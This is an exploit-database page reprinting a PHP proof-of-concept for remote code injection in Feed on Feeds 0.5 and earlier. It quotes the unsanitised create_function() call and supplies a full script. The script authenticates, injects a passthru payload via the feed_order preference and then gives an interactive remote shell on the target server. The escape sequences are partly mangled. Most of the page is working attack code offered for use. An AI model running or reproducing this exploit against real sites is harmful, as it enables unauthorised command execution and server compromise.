Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit
# Published : 2011-09-30
# Author :
# Previous Title : CF Image Hosting Script 1.3.82 File Disclosure
# Next Title : BOOKSolved 1.2.2 Remote File Disclosure
<?php

/*
    ------------------------------------------------------
    Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit
    ------------------------------------------------------
    
    author..........: EgiX
    mail............: n0b0d13s[at]gmail[dot]com
    software link...: http://feedonfeeds.com/ or http://code.google.com/p/feed-on-feeds/

    This PoC was written for educational purpose. Use it at your own risk.
    Author will be not responsible for any damage.
    
    [-] vulnerable code in /fof-main.php

    1091.    function fof_multi_sort($tab,$key,$rev)
    1092.    {
    1093.        if($rev)
    1094.        {
    1095.            $compare = create_function('$a,$b','if (strtolower($a["'.$key.'"]) == strtolower($b["'.$key.'"])) {return 0;}else {return (strtolower($a["'.$key.'"]) > strtolower($b["'.$key.'"])) ? -1 : 1;}');
    1096.        }
    1097.        else
    1098.        {
    1099.            $compare = create_function('$a,$b','if (strtolower($a["'.$key.'"]) == strtolower($b["'.$key.'"])) {return 0;}else {return (strtolower($a["'.$key.'"]) < strtolower($b["'.$key.'"])) ? -1 : 1;}');
    1100.        }
    1101.        
    1102.        usort($tab,$compare) ;
    1103.        return $tab ;
    1104.    }
    
    The $key parameter passed to fof_multi_sort() function isn't properly sanitized before being used in a call 
    to "create_function()" at line 1095 or 1099. This can be exploited to inject and execute arbitrary PHP code.
	Successful exploitation of this vulnerability requires authentication.
    
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die( "n[-] No response from {$host}:80n");
    
    fwrite($sock, $packet);
    return stream_get_contents($sock);
}

function inject_php()
{
    global $host, $path, $user, $pass;
    
    $data    = "feed_order="]));}print('<<');passthru(base64_decode($_SERVER[HTTP_CMD]));print('>>');%23";
    $packet  = "POST {$path}set-prefs.php HTTP/1.0rn";
    $packet .= "Host: {$host}rn";
    $packet .= "Cookie: user_name={$user}; user_password_hash={$pass}rn";
    $packet .= "Content-Length: ".strlen($data)."rn";
    $packet .= "Content-Type: application/x-www-form-urlencodedrn";
    $packet .= "Connection: closernrn";
    $packet .= $data;
    
    if (preg_match("/login.php/", http_send($host, $packet))) die("n[-] Incorrect username or password!n");
}

print "n+----------------------------------------------------------------+";
print "n| Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit by EgiX |";
print "n+----------------------------------------------------------------+n";

if ($argc < 5)
{
    print "nUsage......: php $argv[0] <host> <path> <username> <password>n";
    print "nExample....: php $argv[0] localhost / user pass";
    print "nExample....: php $argv[0] localhost /fof/ user passn";
    die();
}

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = md5($argv[4].$user);

inject_php();

$packet  = "GET {$path}sidebar.php HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Cookie: user_name={$user}; user_password_hash={$pass}rn";
$packet .= "Cmd: %srn";
$packet .= "Connection: closernrn";

while(1)
{
    print "nfof-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/<<(.*)>>/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("n[-] Exploit failed!n");
}

?>